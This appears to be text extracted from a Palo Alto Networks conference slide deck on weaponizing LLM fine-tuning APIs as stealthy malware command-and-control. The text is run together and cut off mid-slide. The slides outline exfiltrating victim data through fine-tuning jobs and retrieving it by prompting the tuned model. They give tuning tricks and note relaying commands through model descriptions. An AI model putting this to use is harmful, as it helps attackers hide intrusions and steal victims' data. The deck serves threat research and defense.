1、WEAPONIZING LLM FINE-TUNING FOR STEALTHY C2 When Attackers Tune InIntroductionBar MatalonThreat Intelligence Team LeadPalo Alto Networks(Cortex)Noa DekelSenior Threat Intelligence ResearcherPalo Alto Networks(Cortex)Is your trusted assistantalso your worst enemy?Is my cat gaslighting me or just hung
2、ry?Explain this CVE like I only have 10 seconds to understandIs it legal if the AI does the hacking?Key PointsThe Growing Threat of LLM AbuseThe Fine Tuning Attack VectorChallenges in Using LLMs for C2Demo of C2LLM in ActionDetection and Defense Strategieshttps:/ Abuse in the WildResearch&Reconnaiss
3、anceSocial EngineeringCodingCommand&Controlhttps:/ GuardrailsInconsistent AnswersIf you cant beat them-tune them!LLM as C2-Not That Easy+Pre-trained ModelTraining DataFine-tuned ModelLLM Fine-TuningImplant gathers victims dataPrepares tuning data set with dataTrains model with dataset via APIAttacke
4、r uses the same API keyPrompts the fine-tuned modelGets victims dataunique_victim_model_nameFine-Tuning Attack-First StepsAnd Then We Tried AgainProblem 1:AI HallucinationsAI Hallucinations Models generate incorrect or fabricatedinformation,presenting it as factCauses Training data noise Lack of con
5、text High temperatureSolution Cool it down!Instead of avoiding model overfitting,strive for itProblem 2:Breaking The Models TrainingProblem The model tends to rely on its previous training when given logical variant namesSolution“Weird”variables Non-contextualized prompts Higher learning rateZ_q!wha
6、t?Z_q!Heres what we know about the victim:Problem 3:Time EfficiencyProblem Fine-tuning a model takes a couple of minutes and tokens per directionSolution Using additional features like model description to relay commandsC2LLM in Action:Part 1-Reconand ExecutionC2LLM-Data Exfiltra